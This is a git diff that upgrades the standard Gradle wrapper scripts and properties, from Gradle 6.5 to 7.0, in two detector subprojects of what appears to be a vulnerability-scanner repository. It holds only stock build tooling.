a/google/detectors/exposedui/elasticsearch/gradle/wrapper/gradle-wrapper.jar b/google/detectors/exposedui/elasticsearch/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/exposedui/elasticsearch/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/exposedui/elasticsearch/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/exposedui/elasticsearch/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/elasticsearch/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/exposedui/elasticsearch/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/elasticsearch/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/exposedui/elasticsearch/gradlew b/google/detectors/exposedui/elasticsearch/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/exposedui/elasticsearch/gradlew +++ b/google/detectors/exposedui/elasticsearch/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/exposedui/elasticsearch/gradlew.bat b/google/detectors/exposedui/elasticsearch/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/exposedui/elasticsearch/gradlew.bat +++ b/google/detectors/exposedui/elasticsearch/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/exposedui/hadoop/yarn/gradle/wrapper/gradle-wrapper.jar b/google/detectors/exposedui/hadoop/yarn/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/exposedui/hadoop/yarn/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/exposedui/hadoop/yarn/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/exposedui/hadoop/yarn/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/hadoop/yarn/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/exposedui/hadoop/yarn/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/hadoop/yarn/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/exposedui/hadoop/yarn/gradlew b/google/detectors/exposedui/hadoop/yarn/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/exposedui/hadoop/yarn/gradlew +++ b/google/detectors/exposedui/hadoop/yarn/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/exposedui/hadoop/yarn/gradlew.bat b/google/detectors/exposedui/hadoop/yarn/gradlew.bat old mode 100755 new mode 100644 index 5093609d5..93e3f59f1 --- a/google/detectors/exposedui/hadoop/yarn/gradlew.bat +++ b/google/detectors/exposedui/hadoop/yarn/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe 